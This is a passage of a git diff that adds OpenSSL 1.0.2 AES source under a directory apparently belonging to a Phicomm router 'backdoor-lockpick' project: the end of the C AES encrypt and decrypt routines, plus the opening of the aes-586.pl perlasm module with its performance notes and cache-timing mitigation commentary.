+            t[i] ^= rk[4+i];
+        }
+    }
+#else
+    t[0] =  Te0[(s0      ) & 0xff] ^
+        Te1[(s1 >>  8) & 0xff] ^
+        Te2[(s2 >> 16) & 0xff] ^
+        Te3[(s3 >> 24)       ] ^
+        rk[4];
+    t[1] =  Te0[(s1      ) & 0xff] ^
+        Te1[(s2 >>  8) & 0xff] ^
+        Te2[(s3 >> 16) & 0xff] ^
+        Te3[(s0 >> 24)       ] ^
+        rk[5];
+    t[2] =  Te0[(s2      ) & 0xff] ^
+        Te1[(s3 >>  8) & 0xff] ^
+        Te2[(s0 >> 16) & 0xff] ^
+        Te3[(s1 >> 24)       ] ^
+        rk[6];
+    t[3] =  Te0[(s3      ) & 0xff] ^
+        Te1[(s0 >>  8) & 0xff] ^
+        Te2[(s1 >> 16) & 0xff] ^
+        Te3[(s2 >> 24)       ] ^
+        rk[7];
+#endif
+    s0 = t[0]; s1 = t[1]; s2 = t[2]; s3 = t[3];
+
+    /*
+     * Nr - 2 full rounds:
+     */
+    for (rk+=8,r=key->rounds-2; r>0; rk+=4,r--) {
+#if defined(AES_COMPACT_IN_INNER_ROUNDS)
+        t[0] =  Te4[(s0      ) & 0xff]       ^
+            Te4[(s1 >>  8) & 0xff] <<  8 ^
+            Te4[(s2 >> 16) & 0xff] << 16 ^
+            Te4[(s3 >> 24)       ] << 24;
+        t[1] =  Te4[(s1      ) & 0xff]       ^
+            Te4[(s2 >>  8) & 0xff] <<  8 ^
+            Te4[(s3 >> 16) & 0xff] << 16 ^
+            Te4[(s0 >> 24)       ] << 24;
+        t[2] =  Te4[(s2      ) & 0xff]       ^
+            Te4[(s3 >>  8) & 0xff] <<  8 ^
+            Te4[(s0 >> 16) & 0xff] << 16 ^
+            Te4[(s1 >> 24)       ] << 24;
+        t[3] =  Te4[(s3      ) & 0xff]       ^
+            Te4[(s0 >>  8) & 0xff] <<  8 ^
+            Te4[(s1 >> 16) & 0xff] << 16 ^
+            Te4[(s2 >> 24)       ] << 24;
+
+        /* now do the linear transform using words */
+        {
+            int i;
+            u32 r0, r1, r2;
+
+            for (i = 0; i < 4; i++) {
+                r0 = t[i];
+                r1 = r0 & 0x80808080;
+                r2 = ((r0 & 0x7f7f7f7f) << 1) ^
+                    ((r1 - (r1 >> 7)) & 0x1b1b1b1b);
+#if defined(ROTATE)
+                t[i] = r2 ^ ROTATE(r2,24) ^ ROTATE(r0,24) ^
+                    ROTATE(r0,16) ^ ROTATE(r0,8);
+#else
+                t[i] = r2 ^ ((r2 ^ r0) << 24) ^ ((r2 ^ r0) >> 8) ^
+                    (r0 << 16) ^ (r0 >> 16) ^
+                    (r0 << 8) ^ (r0 >> 24);
+#endif
+                t[i] ^= rk[i];
+            }
+        }
+#else
+        t[0] =  Te0[(s0      ) & 0xff] ^
+            Te1[(s1 >>  8) & 0xff] ^
+            Te2[(s2 >> 16) & 0xff] ^
+            Te3[(s3 >> 24)       ] ^
+            rk[0];
+        t[1] =  Te0[(s1      ) & 0xff] ^
+            Te1[(s2 >>  8) & 0xff] ^
+            Te2[(s3 >> 16) & 0xff] ^
+            Te3[(s0 >> 24)       ] ^
+            rk[1];
+        t[2] =  Te0[(s2      ) & 0xff] ^
+            Te1[(s3 >>  8) & 0xff] ^
+            Te2[(s0 >> 16) & 0xff] ^
+            Te3[(s1 >> 24)       ] ^
+            rk[2];
+        t[3] =  Te0[(s3      ) & 0xff] ^
+            Te1[(s0 >>  8) & 0xff] ^
+            Te2[(s1 >> 16) & 0xff] ^
+            Te3[(s2 >> 24)       ] ^
+            rk[3];
+#endif
+        s0 = t[0]; s1 = t[1]; s2 = t[2]; s3 = t[3];
+    }
+    /*
+     * apply last round and
+     * map cipher state to byte array block:
+     */
+#if defined(AES_COMPACT_IN_OUTER_ROUNDS)
+    prefetch256(Te4);
+
+    *(u32*)(out+0) =
+        Te4[(s0      ) & 0xff]       ^
+        Te4[(s1 >>  8) & 0xff] <<  8 ^
+        Te4[(s2 >> 16) & 0xff] << 16 ^
+        Te4[(s3 >> 24)       ] << 24 ^
+        rk[0];
+    *(u32*)(out+4) =
+        Te4[(s1      ) & 0xff]       ^
+        Te4[(s2 >>  8) & 0xff] <<  8 ^
+        Te4[(s3 >> 16) & 0xff] << 16 ^
+        Te4[(s0 >> 24)       ] << 24 ^
+        rk[1];
+    *(u32*)(out+8) =
+        Te4[(s2      ) & 0xff]       ^
+        Te4[(s3 >>  8) & 0xff] <<  8 ^
+        Te4[(s0 >> 16) & 0xff] << 16 ^
+        Te4[(s1 >> 24)       ] << 24 ^
+        rk[2];
+    *(u32*)(out+12) =
+        Te4[(s3      ) & 0xff]       ^
+        Te4[(s0 >>  8) & 0xff] <<  8 ^
+        Te4[(s1 >> 16) & 0xff] << 16 ^
+        Te4[(s2 >> 24)       ] << 24 ^
+        rk[3];
+#else
+    *(u32*)(out+0) =
+        (Te2[(s0      ) & 0xff] & 0x000000ffU) ^
+        (Te3[(s1 >>  8) & 0xff] & 0x0000ff00U) ^
+        (Te0[(s2 >> 16) & 0xff] & 0x00ff0000U) ^
+        (Te1[(s3 >> 24)       ] & 0xff000000U) ^
+        rk[0];
+    *(u32*)(out+4) =
+        (Te2[(s1      ) & 0xff] & 0x000000ffU) ^
+        (Te3[(s2 >>  8) & 0xff] & 0x0000ff00U) ^
+        (Te0[(s3 >> 16) & 0xff] & 0x00ff0000U) ^
+        (Te1[(s0 >> 24)       ] & 0xff000000U) ^
+        rk[1];
+    *(u32*)(out+8) =
+        (Te2[(s2      ) & 0xff] & 0x000000ffU) ^
+        (Te3[(s3 >>  8) & 0xff] & 0x0000ff00U) ^
+        (Te0[(s0 >> 16) & 0xff] & 0x00ff0000U) ^
+        (Te1[(s1 >> 24)       ] & 0xff000000U) ^
+        rk[2];
+    *(u32*)(out+12) =
+        (Te2[(s3      ) & 0xff] & 0x000000ffU) ^
+        (Te3[(s0 >>  8) & 0xff] & 0x0000ff00U) ^
+        (Te0[(s1 >> 16) & 0xff] & 0x00ff0000U) ^
+        (Te1[(s2 >> 24)       ] & 0xff000000U) ^
+        rk[3];
+#endif
+}
+
+/*
+ * Decrypt a single block
+ * in and out can overlap
+ */
+void AES_decrypt(const unsigned char *in, unsigned char *out,
+                 const AES_KEY *key)
+{
+
+    const u32 *rk;
+    u32 s0, s1, s2, s3, t[4];
+    int r;
+
+    assert(in && out && key);
+    rk = key->rd_key;
+
+    /*
+     * map byte array block to cipher state
+     * and add initial round key:
+     */
+    s0 = GETU32(in     ) ^ rk[0];
+    s1 = GETU32(in +  4) ^ rk[1];
+    s2 = GETU32(in +  8) ^ rk[2];
+    s3 = GETU32(in + 12) ^ rk[3];
+
+#if defined(AES_COMPACT_IN_OUTER_ROUNDS)
+    prefetch256(Td4);
+
+    t[0] =  Td4[(s0      ) & 0xff]       ^
+    Td4[(s3 >>  8) & 0xff] <<  8 ^
+    Td4[(s2 >> 16) & 0xff] << 16 ^
+    Td4[(s1 >> 24)       ] << 24;
+    t[1] =  Td4[(s1      ) & 0xff]       ^
+    Td4[(s0 >>  8) & 0xff] <<  8 ^
+    Td4[(s3 >> 16) & 0xff] << 16 ^
+    Td4[(s2 >> 24)       ] << 24;
+    t[2] =  Td4[(s2      ) & 0xff]       ^
+    Td4[(s1 >>  8) & 0xff] <<  8 ^
+    Td4[(s0 >> 16) & 0xff] << 16 ^
+    Td4[(s3 >> 24)       ] << 24;
+    t[3] =  Td4[(s3      ) & 0xff]       ^
+    Td4[(s2 >>  8) & 0xff] <<  8 ^
+    Td4[(s1 >> 16) & 0xff] << 16 ^
+    Td4[(s0 >> 24)       ] << 24;
+
+    /* now do the linear transform using words */ 
+    {
+        int i;
+        u32 tp1, tp2, tp4, tp8, tp9, tpb, tpd, tpe, m;
+
+        for (i = 0; i < 4; i++) {
+            tp1 = t[i];
+            m = tp1 & 0x80808080;
+            tp2 = ((tp1 & 0x7f7f7f7f) << 1) ^
+                ((m - (m >> 7)) & 0x1b1b1b1b);
+            m = tp2 & 0x80808080;
+            tp4 = ((tp2 & 0x7f7f7f7f) << 1) ^
+                ((m - (m >> 7)) & 0x1b1b1b1b);
+            m = tp4 & 0x80808080;
+            tp8 = ((tp4 & 0x7f7f7f7f) << 1) ^
+                ((m - (m >> 7)) & 0x1b1b1b1b);
+            tp9 = tp8 ^ tp1;
+            tpb = tp9 ^ tp2;
+            tpd = tp9 ^ tp4;
+            tpe = tp8 ^ tp4 ^ tp2;
+#if defined(ROTATE)
+            t[i] = tpe ^ ROTATE(tpd,16) ^
+                ROTATE(tp9,8) ^ ROTATE(tpb,24);
+#else
+            t[i] = tpe ^ (tpd >> 16) ^ (tpd << 16) ^ 
+                (tp9 >> 24) ^ (tp9 << 8) ^
+                (tpb >> 8) ^ (tpb << 24);
+#endif
+            t[i] ^= rk[4+i];
+        }
+    }
+#else
+    t[0] =  Td0[(s0      ) & 0xff] ^
+        Td1[(s3 >>  8) & 0xff] ^
+        Td2[(s2 >> 16) & 0xff] ^
+        Td3[(s1 >> 24)       ] ^
+        rk[4];
+    t[1] =  Td0[(s1      ) & 0xff] ^
+        Td1[(s0 >>  8) & 0xff] ^
+        Td2[(s3 >> 16) & 0xff] ^
+        Td3[(s2 >> 24)       ] ^
+        rk[5];
+    t[2] =  Td0[(s2      ) & 0xff] ^
+        Td1[(s1 >>  8) & 0xff] ^
+        Td2[(s0 >> 16) & 0xff] ^
+        Td3[(s3 >> 24)       ] ^
+        rk[6];
+    t[3] =  Td0[(s3      ) & 0xff] ^
+        Td1[(s2 >>  8) & 0xff] ^
+        Td2[(s1 >> 16) & 0xff] ^
+        Td3[(s0 >> 24)       ] ^
+        rk[7];
+#endif
+    s0 = t[0]; s1 = t[1]; s2 = t[2]; s3 = t[3];
+
+    /*
+     * Nr - 2 full rounds:
+     */
+    for (rk+=8,r=key->rounds-2; r>0; rk+=4,r--) {
+#if defined(AES_COMPACT_IN_INNER_ROUNDS)
+        t[0] =  Td4[(s0      ) & 0xff]       ^
+        Td4[(s3 >>  8) & 0xff] <<  8 ^
+        Td4[(s2 >> 16) & 0xff] << 16 ^
+        Td4[(s1 >> 24)       ] << 24;
+        t[1] =  Td4[(s1      ) & 0xff]       ^
+        Td4[(s0 >>  8) & 0xff] <<  8 ^
+        Td4[(s3 >> 16) & 0xff] << 16 ^
+        Td4[(s2 >> 24)       ] << 24;
+        t[2] =  Td4[(s2      ) & 0xff]       ^
+        Td4[(s1 >>  8) & 0xff] <<  8 ^
+        Td4[(s0 >> 16) & 0xff] << 16 ^
+        Td4[(s3 >> 24)       ] << 24;
+        t[3] =  Td4[(s3      ) & 0xff]       ^
+        Td4[(s2 >>  8) & 0xff] <<  8 ^
+        Td4[(s1 >> 16) & 0xff] << 16 ^
+        Td4[(s0 >> 24)       ] << 24;
+
+    /* now do the linear transform using words */ 
+    {
+        int i;
+        u32 tp1, tp2, tp4, tp8, tp9, tpb, tpd, tpe, m;
+
+        for (i = 0; i < 4; i++) {
+            tp1 = t[i];
+            m = tp1 & 0x80808080;
+            tp2 = ((tp1 & 0x7f7f7f7f) << 1) ^
+                ((m - (m >> 7)) & 0x1b1b1b1b);
+            m = tp2 & 0x80808080;
+            tp4 = ((tp2 & 0x7f7f7f7f) << 1) ^
+                ((m - (m >> 7)) & 0x1b1b1b1b);
+            m = tp4 & 0x80808080;
+            tp8 = ((tp4 & 0x7f7f7f7f) << 1) ^
+                ((m - (m >> 7)) & 0x1b1b1b1b);
+            tp9 = tp8 ^ tp1;
+            tpb = tp9 ^ tp2;
+            tpd = tp9 ^ tp4;
+            tpe = tp8 ^ tp4 ^ tp2;
+#if defined(ROTATE)
+            t[i] = tpe ^ ROTATE(tpd,16) ^
+                ROTATE(tp9,8) ^ ROTATE(tpb,24);
+#else
+            t[i] = tpe ^ (tpd >> 16) ^ (tpd << 16) ^ 
+                (tp9 >> 24) ^ (tp9 << 8) ^
+                (tpb >> 8) ^ (tpb << 24);
+#endif
+            t[i] ^= rk[i];
+        }
+    }
+#else
+    t[0] =  Td0[(s0      ) & 0xff] ^
+        Td1[(s3 >>  8) & 0xff] ^
+        Td2[(s2 >> 16) & 0xff] ^
+        Td3[(s1 >> 24)       ] ^
+        rk[0];
+    t[1] =  Td0[(s1      ) & 0xff] ^
+        Td1[(s0 >>  8) & 0xff] ^
+        Td2[(s3 >> 16) & 0xff] ^
+        Td3[(s2 >> 24)       ] ^
+        rk[1];
+    t[2] =  Td0[(s2      ) & 0xff] ^
+        Td1[(s1 >>  8) & 0xff] ^
+        Td2[(s0 >> 16) & 0xff] ^
+        Td3[(s3 >> 24)       ] ^
+        rk[2];
+    t[3] =  Td0[(s3      ) & 0xff] ^
+        Td1[(s2 >>  8) & 0xff] ^
+        Td2[(s1 >> 16) & 0xff] ^
+        Td3[(s0 >> 24)       ] ^
+        rk[3];
+#endif
+    s0 = t[0]; s1 = t[1]; s2 = t[2]; s3 = t[3];
+    }
+    /*
+     * apply last round and
+     * map cipher state to byte array block:
+     */
+    prefetch256(Td4);
+
+    *(u32*)(out+0) =
+        (Td4[(s0      ) & 0xff])    ^
+        (Td4[(s3 >>  8) & 0xff] <<  8) ^
+        (Td4[(s2 >> 16) & 0xff] << 16) ^
+        (Td4[(s1 >> 24)       ] << 24) ^
+        rk[0];
+    *(u32*)(out+4) =
+        (Td4[(s1      ) & 0xff])     ^
+        (Td4[(s0 >>  8) & 0xff] <<  8) ^
+        (Td4[(s3 >> 16) & 0xff] << 16) ^
+        (Td4[(s2 >> 24)       ] << 24) ^
+        rk[1];
+    *(u32*)(out+8) =
+        (Td4[(s2      ) & 0xff])     ^
+        (Td4[(s1 >>  8) & 0xff] <<  8) ^
+        (Td4[(s0 >> 16) & 0xff] << 16) ^
+        (Td4[(s3 >> 24)       ] << 24) ^
+        rk[2];
+    *(u32*)(out+12) =
+        (Td4[(s3      ) & 0xff])     ^
+        (Td4[(s2 >>  8) & 0xff] <<  8) ^
+        (Td4[(s1 >> 16) & 0xff] << 16) ^
+        (Td4[(s0 >> 24)       ] << 24) ^
+        rk[3];
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-586.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-586.pl
new file mode 100755
index 0000000..451d0e0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-586.pl
@@ -0,0 +1,2987 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# Version 4.3.
+#
+# You might fail to appreciate this module performance from the first
+# try. If compared to "vanilla" linux-ia32-icc target, i.e. considered
+# to be *the* best Intel C compiler without -KPIC, performance appears
+# to be virtually identical... But try to re-configure with shared
+# library support... Aha! Intel compiler "suddenly" lags behind by 30%
+# [on P4, more on others]:-) And if compared to position-independent
+# code generated by GNU C, this code performs *more* than *twice* as
+# fast! Yes, all this buzz about PIC means that unlike other hand-
+# coded implementations, this one was explicitly designed to be safe
+# to use even in shared library context... This also means that this
+# code isn't necessarily absolutely fastest "ever," because in order
+# to achieve position independence an extra register has to be
+# off-loaded to stack, which affects the benchmark result.
+#
+# Special note about instruction choice. Do you recall RC4_INT code
+# performing poorly on P4? It might be the time to figure out why.
+# RC4_INT code implies effective address calculations in base+offset*4
+# form. Trouble is that it seems that offset scaling turned to be
+# critical path... At least eliminating scaling resulted in 2.8x RC4
+# performance improvement [as you might recall]. As AES code is hungry
+# for scaling too, I [try to] avoid the latter by favoring off-by-2
+# shifts and masking the result with 0xFF<<2 instead of "boring" 0xFF.
+#
+# As was shown by Dean Gaudet <dean@arctic.org>, the above note turned
+# void. Performance improvement with off-by-2 shifts was observed on
+# intermediate implementation, which was spilling yet another register
+# to stack... Final offset*4 code below runs just a tad faster on P4,
+# but exhibits up to 10% improvement on other cores.
+#
+# Second version is "monolithic" replacement for aes_core.c, which in
+# addition to AES_[de|en]crypt implements AES_set_[de|en]cryption_key.
+# This made it possible to implement little-endian variant of the
+# algorithm without modifying the base C code. Motivating factor for
+# the undertaken effort was that it appeared that in tight IA-32
+# register window little-endian flavor could achieve slightly higher
+# Instruction Level Parallelism, and it indeed resulted in up to 15%
+# better performance on most recent µ-archs...
+#
+# Third version adds AES_cbc_encrypt implementation, which resulted in
+# up to 40% performance imrovement of CBC benchmark results. 40% was
+# observed on P4 core, where "overall" imrovement coefficient, i.e. if
+# compared to PIC generated by GCC and in CBC mode, was observed to be
+# as large as 4x:-) CBC performance is virtually identical to ECB now
+# and on some platforms even better, e.g. 17.6 "small" cycles/byte on
+# Opteron, because certain function prologues and epilogues are
+# effectively taken out of the loop...
+#
+# Version 3.2 implements compressed tables and prefetch of these tables
+# in CBC[!] mode. Former means that 3/4 of table references are now
+# misaligned, which unfortunately has negative impact on elder IA-32
+# implementations, Pentium suffered 30% penalty, PIII - 10%.
+#
+# Version 3.3 avoids L1 cache aliasing between stack frame and
+# S-boxes, and 3.4 - L1 cache aliasing even between key schedule. The
+# latter is achieved by copying the key schedule to controlled place in
+# stack. This unfortunately has rather strong impact on small block CBC
+# performance, ~2x deterioration on 16-byte block if compared to 3.3.
+#
+# Version 3.5 checks if there is L1 cache aliasing between user-supplied
+# key schedule and S-boxes and abstains from copying the former if
+# there is no. This allows end-user to consciously retain small block
+# performance by aligning key schedule in specific manner.
+#
+# Version 3.6 compresses Td4 to 256 bytes and prefetches it in ECB.
+#
+# Current ECB performance numbers for 128-bit key in CPU cycles per
+# processed byte [measure commonly used by AES benchmarkers] are:
+#
+#		small footprint		fully unrolled
+# P4		24			22
+# AMD K8	20			19
+# PIII		25			23
+# Pentium	81			78
+#
+# Version 3.7 reimplements outer rounds as "compact." Meaning that
+# first and last rounds reference compact 256 bytes S-box. This means
+# that first round consumes a lot more CPU cycles and that encrypt
+# and decrypt performance becomes asymmetric. Encrypt performance
+# drops by 10-12%, while decrypt - by 20-25%:-( 256 bytes S-box is
+# aggressively pre-fetched.
+#
+# Version 4.0 effectively rolls back to 3.6 and instead implements
+# additional set of functions, _[x86|sse]_AES_[en|de]crypt_compact,
+# which use exclusively 256 byte S-box. These functions are to be
+# called in modes not concealing plain text, such as ECB, or when
+# we're asked to process smaller amount of data [or unconditionally
+# on hyper-threading CPU]. Currently it's called unconditionally from
+# AES_[en|de]crypt, which affects all modes, but CBC. CBC routine
+# still needs to be modified to switch between slower and faster
+# mode when appropriate... But in either case benchmark landscape
+# changes dramatically and below numbers are CPU cycles per processed
+# byte for 128-bit key.
+#
+#		ECB encrypt	ECB decrypt	CBC large chunk
+# P4		52[54]		83[95]		23
+# AMD K8	46[41]		66[70]		18
+# PIII		41[50]		60[77]		24
+# Core 2	31[36]		45[64]		18.5
+# Atom		76[100]		96[138]		60
+# Pentium	115		150		77
+#
+# Version 4.1 switches to compact S-box even in key schedule setup.
+#
+# Version 4.2 prefetches compact S-box in every SSE round or in other
+# words every cache-line is *guaranteed* to be accessed within ~50
+# cycles window. Why just SSE? Because it's needed on hyper-threading
+# CPU! Which is also why it's prefetched with 64 byte stride. Best
+# part is that it has no negative effect on performance:-)  
+#
+# Version 4.3 implements switch between compact and non-compact block
+# functions in AES_cbc_encrypt depending on how much data was asked
+# to be processed in one stroke.
+#
+######################################################################
+# Timing attacks are classified in two classes: synchronous when
+# attacker consciously initiates cryptographic operation and collects
+# timing data of various character afterwards, and asynchronous when
+# malicious code is executed on same CPU simultaneously with AES,
+# instruments itself and performs statistical analysis of this data.
+#
+# As far as synchronous attacks go the root to the AES timing
+# vulnerability is twofold. Firstly, of 256 S-box elements at most 160
+# are referred to in single 128-bit block operation. Well, in C
+# implementation with 4 distinct tables it's actually as little as 40
+# references per 256 elements table, but anyway... Secondly, even
+# though S-box elements are clustered into smaller amount of cache-
+# lines, smaller than 160 and even 40, it turned out that for certain
+# plain-text pattern[s] or simply put chosen plain-text and given key
+# few cache-lines remain unaccessed during block operation. Now, if
+# attacker can figure out this access pattern, he can deduct the key
+# [or at least part of it]. The natural way to mitigate this kind of
+# attacks is to minimize the amount of cache-lines in S-box and/or
+# prefetch them to ensure that every one is accessed for more uniform
+# timing. But note that *if* plain-text was concealed in such way that
+# input to block function is distributed *uniformly*, then attack
+# wouldn't apply. Now note that some encryption modes, most notably
+# CBC, do mask the plain-text in this exact way [secure cipher output
+# is distributed uniformly]. Yes, one still might find input that
+# would reveal the information about given key, but if amount of
+# candidate inputs to be tried is larger than amount of possible key
+# combinations then attack becomes infeasible. This is why revised
+# AES_cbc_encrypt "dares" to switch to larger S-box when larger chunk
+# of data is to be processed in one stroke. The current size limit of
+# 512 bytes is chosen to provide same [diminishigly low] probability
+# for cache-line to remain untouched in large chunk operation with
+# large S-box as for single block operation with compact S-box and
+# surely needs more careful consideration...
+#
+# As for asynchronous attacks. There are two flavours: attacker code
+# being interleaved with AES on hyper-threading CPU at *instruction*
+# level, and two processes time sharing single core. As for latter.
+# Two vectors. 1. Given that attacker process has higher priority,
+# yield execution to process performing AES just before timer fires
+# off the scheduler, immediately regain control of CPU and analyze the
+# cache state. For this attack to be efficient attacker would have to
+# effectively slow down the operation by several *orders* of magnitute,
+# by ratio of time slice to duration of handful of AES rounds, which
+# unlikely to remain unnoticed. Not to mention that this also means
+# that he would spend correspondigly more time to collect enough
+# statistical data to mount the attack. It's probably appropriate to
+# say that if adeversary reckons that this attack is beneficial and
+# risks to be noticed, you probably have larger problems having him
+# mere opportunity. In other words suggested code design expects you
+# to preclude/mitigate this attack by overall system security design.
+# 2. Attacker manages to make his code interrupt driven. In order for
+# this kind of attack to be feasible, interrupt rate has to be high
+# enough, again comparable to duration of handful of AES rounds. But
+# is there interrupt source of such rate? Hardly, not even 1Gbps NIC
+# generates interrupts at such raging rate...
+#
+# And now back to the former, hyper-threading CPU or more specifically
+# Intel P4. Recall that asynchronous attack implies that malicious
+# code instruments itself. And naturally instrumentation granularity
+# has be noticeably lower than duration of codepath accessing S-box.
+# Given that all cache-lines are accessed during that time that is.
+# Current implementation accesses *all* cache-lines within ~50 cycles
+# window, which is actually *less* than RDTSC latency on Intel P4!
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+
+&asm_init($ARGV[0],"aes-586.pl",$x86only = $ARGV[$#ARGV] eq "386");
+&static_label("AES_Te");
+&static_label("AES_Td");
+
+$s0="eax";
+$s1="ebx";
+$s2="ecx";
+$s3="edx";
+$key="edi";
+$acc="esi";
+$tbl="ebp";
+
+# stack frame layout in _[x86|sse]_AES_* routines, frame is allocated
+# by caller
+$__ra=&DWP(0,"esp");	# return address
+$__s0=&DWP(4,"esp");	# s0 backing store
+$__s1=&DWP(8,"esp");	# s1 backing store
+$__s2=&DWP(12,"esp");	# s2 backing store
+$__s3=&DWP(16,"esp");	# s3 backing store
+$__key=&DWP(20,"esp");	# pointer to key schedule
+$__end=&DWP(24,"esp");	# pointer to end of key schedule
+$__tbl=&DWP(28,"esp");	# %ebp backing store
+
+# stack frame layout in AES_[en|crypt] routines, which differs from
+# above by 4 and overlaps by %ebp backing store
+$_tbl=&DWP(24,"esp");
+$_esp=&DWP(28,"esp");
+
+sub _data_word() { my $i; while(defined($i=shift)) { &data_word($i,$i); } }
+
+$speed_limit=512;	# chunks smaller than $speed_limit are
+			# processed with compact routine in CBC mode
+$small_footprint=1;	# $small_footprint=1 code is ~5% slower [on
+			# recent µ-archs], but ~5 times smaller!
+			# I favor compact code to minimize cache
+			# contention and in hope to "collect" 5% back
+			# in real-life applications...
+
+$vertical_spin=0;	# shift "verticaly" defaults to 0, because of
+			# its proof-of-concept status...
+# Note that there is no decvert(), as well as last encryption round is
+# performed with "horizontal" shifts. This is because this "vertical"
+# implementation [one which groups shifts on a given $s[i] to form a
+# "column," unlike "horizontal" one, which groups shifts on different
+# $s[i] to form a "row"] is work in progress. It was observed to run
+# few percents faster on Intel cores, but not AMD. On AMD K8 core it's
+# whole 12% slower:-( So we face a trade-off... Shall it be resolved
+# some day? Till then the code is considered experimental and by
+# default remains dormant...
+
+sub encvert()
+{ my ($te,@s) = @_;
+  my ($v0,$v1) = ($acc,$key);
+
+	&mov	($v0,$s[3]);				# copy s3
+	&mov	(&DWP(4,"esp"),$s[2]);			# save s2
+	&mov	($v1,$s[0]);				# copy s0
+	&mov	(&DWP(8,"esp"),$s[1]);			# save s1
+
+	&movz	($s[2],&HB($s[0]));
+	&and	($s[0],0xFF);
+	&mov	($s[0],&DWP(0,$te,$s[0],8));		# s0>>0
+	&shr	($v1,16);
+	&mov	($s[3],&DWP(3,$te,$s[2],8));		# s0>>8
+	&movz	($s[1],&HB($v1));
+	&and	($v1,0xFF);
+	&mov	($s[2],&DWP(2,$te,$v1,8));		# s0>>16
+	 &mov	($v1,$v0);
+	&mov	($s[1],&DWP(1,$te,$s[1],8));		# s0>>24
+
+	&and	($v0,0xFF);
+	&xor	($s[3],&DWP(0,$te,$v0,8));		# s3>>0
+	&movz	($v0,&HB($v1));
+	&shr	($v1,16);
+	&xor	($s[2],&DWP(3,$te,$v0,8));		# s3>>8
+	&movz	($v0,&HB($v1));
+	&and	($v1,0xFF);
+	&xor	($s[1],&DWP(2,$te,$v1,8));		# s3>>16
+	 &mov	($v1,&DWP(4,"esp"));			# restore s2
+	&xor	($s[0],&DWP(1,$te,$v0,8));		# s3>>24
+
+	&mov	($v0,$v1);
+	&and	($v1,0xFF);
+	&xor	($s[2],&DWP(0,$te,$v1,8));		# s2>>0
+	&movz	($v1,&HB($v0));
+	&shr	($v0,16);
+	&xor	($s[1],&DWP(3,$te,$v1,8));		# s2>>8
+	&movz	($v1,&HB($v0));
+	&and	($v0,0xFF);
+	&xor	($s[0],&DWP(2,$te,$v0,8));		# s2>>16
+	 &mov	($v0,&DWP(8,"esp"));			# restore s1
+	&xor	($s[3],&DWP(1,$te,$v1,8));		# s2>>24
+
+	&mov	($v1,$v0);
+	&and	($v0,0xFF);
+	&xor	($s[1],&DWP(0,$te,$v0,8));		# s1>>0
+	&movz	($v0,&HB($v1));
+	&shr	($v1,16);
+	&xor	($s[0],&DWP(3,$te,$v0,8));		# s1>>8
+	&movz	($v0,&HB($v1));
+	&and	($v1,0xFF);
+	&xor	($s[3],&DWP(2,$te,$v1,8));		# s1>>16
+	 &mov	($key,$__key);				# reincarnate v1 as key
+	&xor	($s[2],&DWP(1,$te,$v0,8));		# s1>>24
+}
+
+# Another experimental routine, which features "horizontal spin," but
+# eliminates one reference to stack. Strangely enough runs slower...
+sub enchoriz()
+{ my ($v0,$v1) = ($key,$acc);
+
+	&movz	($v0,&LB($s0));			#  3, 2, 1, 0*
+	&rotr	($s2,8);			#  8,11,10, 9
+	&mov	($v1,&DWP(0,$te,$v0,8));	#  0
+	&movz	($v0,&HB($s1));			#  7, 6, 5*, 4
+	&rotr	($s3,16);			# 13,12,15,14
+	&xor	($v1,&DWP(3,$te,$v0,8));	#  5
+	&movz	($v0,&HB($s2));			#  8,11,10*, 9
+	&rotr	($s0,16);			#  1, 0, 3, 2
+	&xor	($v1,&DWP(2,$te,$v0,8));	# 10
+	&movz	($v0,&HB($s3));			# 13,12,15*,14
+	&xor	($v1,&DWP(1,$te,$v0,8));	# 15, t[0] collected
+	&mov	($__s0,$v1);			# t[0] saved
+
+	&movz	($v0,&LB($s1));			#  7, 6, 5, 4*
+	&shr	($s1,16);			#  -, -, 7, 6
+	&mov	($v1,&DWP(0,$te,$v0,8));	#  4
+	&movz	($v0,&LB($s3));			# 13,12,15,14*
+	&xor	($v1,&DWP(2,$te,$v0,8));	# 14
+	&movz	($v0,&HB($s0));			#  1, 0, 3*, 2
+	&and	($s3,0xffff0000);		# 13,12, -, -
+	&xor	($v1,&DWP(1,$te,$v0,8));	#  3
+	&movz	($v0,&LB($s2));			#  8,11,10, 9*
+	&or	($s3,$s1);			# 13,12, 7, 6
+	&xor	($v1,&DWP(3,$te,$v0,8));	#  9, t[1] collected
+	&mov	($s1,$v1);			#  s[1]=t[1]
+
+	&movz	($v0,&LB($s0));			#  1, 0, 3, 2*
+	&shr	($s2,16);			#  -, -, 8,11
+	&mov	($v1,&DWP(2,$te,$v0,8));	#  2
+	&movz	($v0,&HB($s3));			# 13,12, 7*, 6
+	&xor	($v1,&DWP(1,$te,$v0,8));	#  7
+	&movz	($v0,&HB($s2));			#  -, -, 8*,11
+	&xor	($v1,&DWP(0,$te,$v0,8));	#  8
+	&mov	($v0,$s3);
+	&shr	($v0,24);			# 13
+	&xor	($v1,&DWP(3,$te,$v0,8));	# 13, t[2] collected
+
+	&movz	($v0,&LB($s2));			#  -, -, 8,11*
+	&shr	($s0,24);			#  1*
+	&mov	($s2,&DWP(1,$te,$v0,8));	# 11
+	&xor	($s2,&DWP(3,$te,$s0,8));	#  1
+	&mov	($s0,$__s0);			# s[0]=t[0]
+	&movz	($v0,&LB($s3));			# 13,12, 7, 6*
+	&shr	($s3,16);			#   ,  ,13,12
+	&xor	($s2,&DWP(2,$te,$v0,8));	#  6
+	&mov	($key,$__key);			# reincarnate v0 as key
+	&and	($s3,0xff);			#   ,  ,13,12*
+	&mov	($s3,&DWP(0,$te,$s3,8));	# 12
+	&xor	($s3,$s2);			# s[2]=t[3] collected
+	&mov	($s2,$v1);			# s[2]=t[2]
+}
+
+# More experimental code... SSE one... Even though this one eliminates
+# *all* references to stack, it's not faster...
+sub sse_encbody()
+{
+	&movz	($acc,&LB("eax"));		#  0
